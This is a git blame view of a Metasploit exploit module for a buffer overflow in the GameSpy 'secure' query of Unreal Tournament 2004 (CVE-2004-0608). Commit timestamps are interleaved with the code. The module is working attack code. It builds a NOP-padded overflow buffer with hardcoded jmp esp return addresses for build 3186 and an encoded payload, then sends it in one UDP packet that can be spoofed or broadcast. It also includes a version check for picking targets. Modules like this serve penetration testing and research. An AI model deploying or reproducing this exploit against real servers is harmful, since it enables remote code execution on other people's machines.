Files
metasploit-gs/modules/exploits/windows/games/ut2004_secure.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

112 lines
2.7 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = GoodRanking
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::Udp
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
def initialize(info = {})
2010-02-02 06:19:34 +00:00
super(update_info(info,
2005-12-26 14:34:22 +00:00
'Name' => 'Unreal Tournament 2004 "secure" Overflow (Win32)',
'Description' => %q{
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
This is an exploit for the GameSpy secure query in
the Unreal Engine.
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
This exploit only requires one UDP packet, which can
be both spoofed and sent to a broadcast address.
Usually, the GameSpy query server listens on port 7787,
but you can manually specify the port as well.
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
The RunServer.sh script will automatically restart the
server upon a crash, giving us the ability to
bruteforce the service and exploit it multiple
2010-02-02 06:19:34 +00:00
times.
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
},
'Author' => [ 'stinko' ],
'License' => BSD_LICENSE,
2005-12-26 14:34:22 +00:00
'References' =>
[
[ 'CVE', '2004-0608'],
[ 'OSVDB', '7217'],
2005-12-26 14:34:22 +00:00
[ 'BID', '10570'],
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
],
'Privileged' => true,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x5c\x00",
},
'Platform' => 'win',
2010-02-02 06:19:34 +00:00
'Targets' =>
2005-12-26 14:34:22 +00:00
[
['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp
],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2004-06-18',
2005-12-26 14:34:22 +00:00
'DefaultTarget' => 0))
2013-08-30 16:28:54 -05:00
2010-02-02 06:19:34 +00:00
register_options(
[
Opt::RPORT(7787)
])
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
def exploit
connect_udp
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
buf = make_nops(1024)
buf[0, 60] = [target['Rets'][0]].pack('V') * 15
buf[54, 4] = [target['Rets'][1]].pack('V')
buf[0, 8] = "\\secure\\"
buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
2013-08-30 16:28:54 -05:00
2010-02-02 06:19:34 +00:00
udp_sock.put(buf)
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
handler
disconnect_udp
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
def ut_version
connect_udp
udp_sock.put("\\basic\\")
res = udp_sock.recvfrom(8192)
2010-02-02 06:19:34 +00:00
disconnect_udp
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
return m[1]
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
return
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
def check
vers = ut_version
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
if (not vers)
print_status("Could not detect Unreal Tournament Server")
return
end
2013-08-30 16:28:54 -05:00
2014-01-21 11:07:03 -06:00
vprint_status("Detected Unreal Tournament Server Version: #{vers}")
2005-12-26 14:34:22 +00:00
if (vers =~ /^(3120|3186|3204)$/)
2014-01-21 11:07:03 -06:00
vprint_status("This system appears to be exploitable")
2005-12-26 14:34:22 +00:00
return Exploit::CheckCode::Appears
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
if (vers =~ /^(2...)$/)
2014-01-21 11:07:03 -06:00
vprint_status("This system appears to be running UT2003")
2005-12-26 14:34:22 +00:00
return Exploit::CheckCode::Detected
end
2013-08-30 16:28:54 -05:00
2014-01-21 11:07:03 -06:00
vprint_status("This system appears to be patched")
2005-12-26 14:34:22 +00:00
return Exploit::CheckCode::Safe
end
end